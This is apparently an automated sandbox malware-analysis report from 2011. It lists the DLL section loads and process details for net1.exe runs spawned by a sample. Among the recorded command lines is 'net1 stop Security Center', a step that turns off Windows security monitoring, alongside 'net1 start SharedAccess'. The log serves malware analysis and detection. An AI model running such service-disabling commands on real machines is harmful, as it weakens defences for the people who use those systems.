Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: image Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1621978987
Section loaded	Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid	success or wait	1622110865
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 280000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1622191049
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1622381621
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1622394401
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid	success or wait	1622425820
Section loaded	Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid	success or wait	1622533528
Section loaded	Path: \KnownDlls\ole32.dll Access: write and read and execute Type: image Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid	success or wait	1622698403
Section loaded	Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: image Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	success or wait	1623006554
Section loaded	Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid	success or wait	1623117135
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: image Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1623228901
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: image Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	1623444879
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: image Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	1623645622
Section loaded	Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: image Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	success or wait	1623749554
Section loaded	Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid	success or wait	1623823524
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: image Baseaddress: 3D0000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1623896564
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1624007735
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1624010236
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	1624029850
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 1020000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	1625106953
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 1056768 Protection: execute Mapped to pid: own pid	success or wait	1625206259
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	1625213533
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 380000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	1625338688
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1625362965
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1625427086
Section loaded	Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: image Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid	success or wait	1625473235
Section loaded	Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 8B0000 Size: 618496 Protection: readonly Mapped to pid: own pid	success or wait	1625588749
Section loaded	Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: image Baseaddress: 8B0000 Size: 57344 Protection: read write Mapped to pid: own pid	success or wait	1626228543
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: write and read and execute Type: commit Baseaddress: 8C0000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	1626231499
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: query and write and read and execute Type: image Baseaddress: 77B40000 Size: 139264 Protection: read write Mapped to pid: own pid	success or wait	1626243004
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 8C0000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1626275720
Section loaded	Path: C:\WINDOWS\system32\net1.exe Access: write and read and execute Type: commit Baseaddress: 9F0000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	1626368653
Section loaded	Path: C:\WINDOWS\system32\net1.exe Access: query and read Type: commit Baseaddress: 9F0000 Size: 126976 Protection: readonly Mapped to pid: own pid	success or wait	1626506750
Section loaded	Path: C:\WINDOWS\system32\net1.exe Access: write and read and execute Type: commit Baseaddress: 9F0000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	1626510787
Section loaded	Path: C:\WINDOWS\system32\net1.exe Access: query and read Type: commit Baseaddress: 9F0000 Size: 126976 Protection: readonly Mapped to pid: own pid	success or wait	1626557316
Process created	PID: 2328 Path: C:\WINDOWS\system32\net1.exe Cmdline: net1 start SharedAccess Createflags: suspended	success or wait	1626583098

Analysis File: net1.exe PID: 2328 Parent PID: 1928

Sections

General
Start time:	07:41:22
Start date:	21/09/2011
Path:	C:\WINDOWS\system32\net1.exe
Commandline:	net1 start SharedAccess
Imagebase:	0x1000000
File size:	124928 bytes
MD5 hash:	3F14C041342E3FBA343F2A1D11E74BBA

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	image	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	image	1B0000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	image	1D0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	image	220000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	image	270000	24576	own pid	readonly	success or wait	1
\KnownDlls\msvcrt.dll	write and read and execute	image	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	image	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	image	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	image	77FE0000	69632	own pid	read write	success or wait	1
C:\WINDOWS\system32\netapi32.dll	query and write and read and execute	image	5B860000	348160	own pid	read write	success or wait	1
C:\WINDOWS\system32\samlib.dll	query and write and read and execute	image	71BF0000	77824	own pid	read write	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	image	7E410000	593920	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	image	77F10000	299008	own pid	read write	success or wait	1
C:\WINDOWS\system32\ntdsapi.dll	query and write and read and execute	image	767A0000	77824	own pid	read write	success or wait	1
C:\WINDOWS\system32\dnsapi.dll	query and write and read and execute	image	76F20000	159744	own pid	read write	success or wait	1
C:\WINDOWS\system32\ws2_32.dll	query and write and read and execute	image	71AB0000	94208	own pid	read write	success or wait	1
C:\WINDOWS\system32\ws2help.dll	query and write and read and execute	image	71AA0000	32768	own pid	read write	success or wait	1
\KnownDlls\WLDAP32.dll	write and read and execute	image	76F60000	180224	own pid	read write	success or wait	1
C:\WINDOWS\system32\netrap.dll	query and write and read and execute	image	71C80000	28672	own pid	read write	success or wait	1
C:\WINDOWS\system32\shimeng.dll	query and write and read and execute	image	5CB70000	155648	own pid	read write	success or wait	1
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	280000	1208320	own pid	readonly	success or wait	1
C:\WINDOWS\AppPatch\acgenral.dll	write and read and execute	commit	3C0000	1855488	own pid	execute	success or wait	2
C:\WINDOWS\AppPatch\acgenral.dll	query and write and read and execute	image	6F880000	1875968	own pid	read write	success or wait	1
C:\WINDOWS\system32\winmm.dll	query and write and read and execute	image	76B40000	184320	own pid	read write	success or wait	1
\KnownDlls\ole32.dll	write and read and execute	image	774E0000	1302528	own pid	read write	success or wait	1
\KnownDlls\OLEAUT32.dll	write and read and execute	image	77120000	569344	own pid	read write	success or wait	1
C:\WINDOWS\system32\msacm32.dll	query and write and read and execute	image	77BE0000	86016	own pid	read write	success or wait	1
\KnownDlls\VERSION.dll	write and read and execute	image	77C00000	32768	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	image	7C9C0000	8482816	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	image	77F60000	483328	own pid	read write	success or wait	1
\KnownDlls\USERENV.dll	write and read and execute	image	769C0000	737280	own pid	read write	success or wait	1
C:\WINDOWS\system32\uxtheme.dll	query and write and read and execute	image	5AD70000	229376	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	image	3D0000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	350000	110592	own pid	execute	success or wait	2
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
C:\WINDOWS\system32\shell32.dll	read	commit	1030000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	write and read and execute	commit	8B0000	1056768	own pid	execute	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	380000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	380000	4096	own pid	readonly	success or wait	2
\KnownDlls\comctl32.dll	write and read and execute	image	5D090000	630784	own pid	read write	success or wait	1
C:\WINDOWS\system32\comctl32.dll	read	commit	8B0000	618496	own pid	readonly	success or wait	1

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address
C:\WINDOWS\system32\netmsg.dll	query and write and read and execute	image	71B40000	180224	own pid	read write	success or wait	1	10132A7

Thread Activities:

Thread delayed
TID	Delay	Completion	Count	Source Address
9042	2s	success or wait	1	100A0FE

Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: image Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1629705306
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: image Baseaddress: 1B0000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	1629803931
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: image Baseaddress: 1D0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1629827769
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: image Baseaddress: 220000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1629836134
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: image Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	1629839615
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: image Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1630399519
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: image Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1630502716
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: image Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	1630514337
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: image Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1630532329
Section loaded	Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid	success or wait	1630585054
Section loaded	Path: C:\WINDOWS\system32\samlib.dll Access: query and write and read and execute Type: image Baseaddress: 71BF0000 Size: 77824 Protection: read write Mapped to pid: own pid	success or wait	1630665812
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: image Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	1630743368
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: image Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1630746525
Section loaded	Path: C:\WINDOWS\system32\ntdsapi.dll Access: query and write and read and execute Type: image Baseaddress: 767A0000 Size: 77824 Protection: read write Mapped to pid: own pid	success or wait	1630801402
Section loaded	Path: C:\WINDOWS\system32\dnsapi.dll Access: query and write and read and execute Type: image Baseaddress: 76F20000 Size: 159744 Protection: read write Mapped to pid: own pid	success or wait	1630841521
Section loaded	Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid	success or wait	1630874252
Section loaded	Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1630937583
Section loaded	Path: \KnownDlls\WLDAP32.dll Access: write and read and execute Type: image Baseaddress: 76F60000 Size: 180224 Protection: read write Mapped to pid: own pid	success or wait	1631091697
Section loaded	Path: C:\WINDOWS\system32\netrap.dll Access: query and write and read and execute Type: image Baseaddress: 71C80000 Size: 28672 Protection: read write Mapped to pid: own pid	success or wait	1631128794
Section loaded	Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid	success or wait	1631206143
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 280000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1631287239
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1631367829
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1631417275
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid	success or wait	1631454959
Section loaded	Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid	success or wait	1631696217
Section loaded	Path: \KnownDlls\ole32.dll Access: write and read and execute Type: image Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid	success or wait	1631839212
Section loaded	Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: image Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	success or wait	1631964899
Section loaded	Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid	success or wait	1632009512
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: image Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1632082996
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: image Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	1632152555
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: image Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	1632430260
Section loaded	Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: image Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	success or wait	1632496930
Section loaded	Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid	success or wait	1632539040
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: image Baseaddress: 3D0000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1632606811
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1632696516
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1632702399
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	1632705504
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 1030000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	1633344652
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 1056768 Protection: execute Mapped to pid: own pid	success or wait	1633437023
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	1633441654
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 380000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	1633469956
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1633474674
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1633540051
Section loaded	Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: image Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid	success or wait	1633611935
Section loaded	Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 8B0000 Size: 618496 Protection: readonly Mapped to pid: own pid	success or wait	1633668683
Section loaded	Path: C:\WINDOWS\system32\netmsg.dll Access: query and write and read and execute Type: image Baseaddress: 71B40000 Size: 180224 Protection: read write Mapped to pid: own pid	success or wait	1635258898
Thread delayed	Time: 2 TID: 9042	success or wait	1635319352

Analysis File: net1.exe PID: 2348 Parent PID: 1984

Sections

General
Start time:	07:41:22
Start date:	21/09/2011
Path:	C:\WINDOWS\system32\net1.exe
Commandline:	net1 stop Security Center
Imagebase:	0x1000000
File size:	124928 bytes
MD5 hash:	3F14C041342E3FBA343F2A1D11E74BBA

Section Activities:

Section loaded by Windows
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count
\KnownDlls\kernel32.dll	write and read and execute	image	7C800000	1007616	own pid	read write	success or wait	1
\NLS\NlsSectionUnicode	read	image	1B0000	90112	own pid	readonly	success or wait	1
\NLS\NlsSectionLocale	read	image	1D0000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortkey	query and read	image	220000	266240	own pid	readonly	success or wait	1
\NLS\NlsSectionSortTbls	read	image	270000	24576	own pid	readonly	success or wait	1
\KnownDlls\msvcrt.dll	write and read and execute	image	77C10000	360448	own pid	read write	success or wait	1
\KnownDlls\ADVAPI32.dll	write and read and execute	image	77DD0000	634880	own pid	read write	success or wait	1
\KnownDlls\RPCRT4.dll	write and read and execute	image	77E70000	602112	own pid	read write	success or wait	1
\KnownDlls\Secur32.dll	write and read and execute	image	77FE0000	69632	own pid	read write	success or wait	1
C:\WINDOWS\system32\netapi32.dll	query and write and read and execute	image	5B860000	348160	own pid	read write	success or wait	1
C:\WINDOWS\system32\samlib.dll	query and write and read and execute	image	71BF0000	77824	own pid	read write	success or wait	1
\KnownDlls\USER32.dll	write and read and execute	image	7E410000	593920	own pid	read write	success or wait	1
\KnownDlls\GDI32.dll	write and read and execute	image	77F10000	299008	own pid	read write	success or wait	1
C:\WINDOWS\system32\ntdsapi.dll	query and write and read and execute	image	767A0000	77824	own pid	read write	success or wait	1
C:\WINDOWS\system32\dnsapi.dll	query and write and read and execute	image	76F20000	159744	own pid	read write	success or wait	1
C:\WINDOWS\system32\ws2_32.dll	query and write and read and execute	image	71AB0000	94208	own pid	read write	success or wait	1
C:\WINDOWS\system32\ws2help.dll	query and write and read and execute	image	71AA0000	32768	own pid	read write	success or wait	1
\KnownDlls\WLDAP32.dll	write and read and execute	image	76F60000	180224	own pid	read write	success or wait	1
C:\WINDOWS\system32\netrap.dll	query and write and read and execute	image	71C80000	28672	own pid	read write	success or wait	1
C:\WINDOWS\system32\shimeng.dll	query and write and read and execute	image	5CB70000	155648	own pid	read write	success or wait	1
C:\WINDOWS\AppPatch\sysmain.sdb	read	commit	280000	1208320	own pid	readonly	success or wait	1
C:\WINDOWS\AppPatch\acgenral.dll	write and read and execute	commit	3C0000	1855488	own pid	execute	success or wait	2
C:\WINDOWS\AppPatch\acgenral.dll	query and write and read and execute	image	6F880000	1875968	own pid	read write	success or wait	1
C:\WINDOWS\system32\winmm.dll	query and write and read and execute	image	76B40000	184320	own pid	read write	success or wait	1
\KnownDlls\ole32.dll	write and read and execute	image	774E0000	1302528	own pid	read write	success or wait	1
\KnownDlls\OLEAUT32.dll	write and read and execute	image	77120000	569344	own pid	read write	success or wait	1
C:\WINDOWS\system32\msacm32.dll	query and write and read and execute	image	77BE0000	86016	own pid	read write	success or wait	1
\KnownDlls\VERSION.dll	write and read and execute	image	77C00000	32768	own pid	read write	success or wait	1
\KnownDlls\SHELL32.dll	write and read and execute	image	7C9C0000	8482816	own pid	read write	success or wait	1
\KnownDlls\SHLWAPI.dll	write and read and execute	image	77F60000	483328	own pid	read write	success or wait	1
\KnownDlls\USERENV.dll	write and read and execute	image	769C0000	737280	own pid	read write	success or wait	1
C:\WINDOWS\system32\uxtheme.dll	query and write and read and execute	image	5AD70000	229376	own pid	read write	success or wait	1
\NLS\NlsSectionCType	read	image	3D0000	12288	own pid	readonly	success or wait	1
C:\WINDOWS\system32\imm32.dll	write and read and execute	commit	350000	110592	own pid	execute	success or wait	2
C:\WINDOWS\system32\imm32.dll	query and write and read and execute	image	76390000	118784	own pid	read write	success or wait	1
C:\WINDOWS\system32\shell32.dll	read	commit	1030000	8462336	own pid	readonly	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	write and read and execute	commit	8B0000	1056768	own pid	execute	success or wait	1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll	query and write and read and execute	image	773D0000	1060864	own pid	read write	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	write and read and execute	commit	380000	4096	own pid	execute	success or wait	1
C:\WINDOWS\WindowsShell.Manifest	query and read	commit	380000	4096	own pid	readonly	success or wait	2
\KnownDlls\comctl32.dll	write and read and execute	image	5D090000	630784	own pid	read write	success or wait	1
C:\WINDOWS\system32\comctl32.dll	read	commit	8B0000	618496	own pid	readonly	success or wait	1

Section loaded by program
File Path	Access	Type	Base	Size	Mapped to pid	Protection	Completion	Count	Source Address
C:\WINDOWS\system32\netmsg.dll	query and write and read and execute	image	71B40000	180224	own pid	read write	success or wait	1	10132A7

Chronological sections
Operation	Data	Completion	Time
Section loaded	Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: image Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid	success or wait	1629740057
Section loaded	Path: \NLS\NlsSectionUnicode Access: read Type: image Baseaddress: 1B0000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	1629837634
Section loaded	Path: \NLS\NlsSectionLocale Access: read Type: image Baseaddress: 1D0000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1629842303
Section loaded	Path: \NLS\NlsSectionSortkey Access: query and read Type: image Baseaddress: 220000 Size: 266240 Protection: readonly Mapped to pid: own pid	success or wait	1630355567
Section loaded	Path: \NLS\NlsSectionSortTbls Access: read Type: image Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid	success or wait	1630356105
Section loaded	Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: image Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid	success or wait	1630416502
Section loaded	Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: image Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid	success or wait	1630498034
Section loaded	Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: image Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid	success or wait	1630510613
Section loaded	Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: image Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid	success or wait	1630525295
Section loaded	Path: C:\WINDOWS\system32\netapi32.dll Access: query and write and read and execute Type: image Baseaddress: 5B860000 Size: 348160 Protection: read write Mapped to pid: own pid	success or wait	1630581204
Section loaded	Path: C:\WINDOWS\system32\samlib.dll Access: query and write and read and execute Type: image Baseaddress: 71BF0000 Size: 77824 Protection: read write Mapped to pid: own pid	success or wait	1630623346
Section loaded	Path: \KnownDlls\USER32.dll Access: write and read and execute Type: image Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid	success or wait	1630733013
Section loaded	Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: image Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid	success or wait	1630735763
Section loaded	Path: C:\WINDOWS\system32\ntdsapi.dll Access: query and write and read and execute Type: image Baseaddress: 767A0000 Size: 77824 Protection: read write Mapped to pid: own pid	success or wait	1630787085
Section loaded	Path: C:\WINDOWS\system32\dnsapi.dll Access: query and write and read and execute Type: image Baseaddress: 76F20000 Size: 159744 Protection: read write Mapped to pid: own pid	success or wait	1630798608
Section loaded	Path: C:\WINDOWS\system32\ws2_32.dll Access: query and write and read and execute Type: image Baseaddress: 71AB0000 Size: 94208 Protection: read write Mapped to pid: own pid	success or wait	1630867274
Section loaded	Path: C:\WINDOWS\system32\ws2help.dll Access: query and write and read and execute Type: image Baseaddress: 71AA0000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1630911146
Section loaded	Path: \KnownDlls\WLDAP32.dll Access: write and read and execute Type: image Baseaddress: 76F60000 Size: 180224 Protection: read write Mapped to pid: own pid	success or wait	1631030163
Section loaded	Path: C:\WINDOWS\system32\netrap.dll Access: query and write and read and execute Type: image Baseaddress: 71C80000 Size: 28672 Protection: read write Mapped to pid: own pid	success or wait	1631119030
Section loaded	Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid	success or wait	1631149287
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 280000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1631205574
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1631308460
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid	success or wait	1631350844
Section loaded	Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid	success or wait	1631364750
Section loaded	Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid	success or wait	1631507257
Section loaded	Path: \KnownDlls\ole32.dll Access: write and read and execute Type: image Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid	success or wait	1631743395
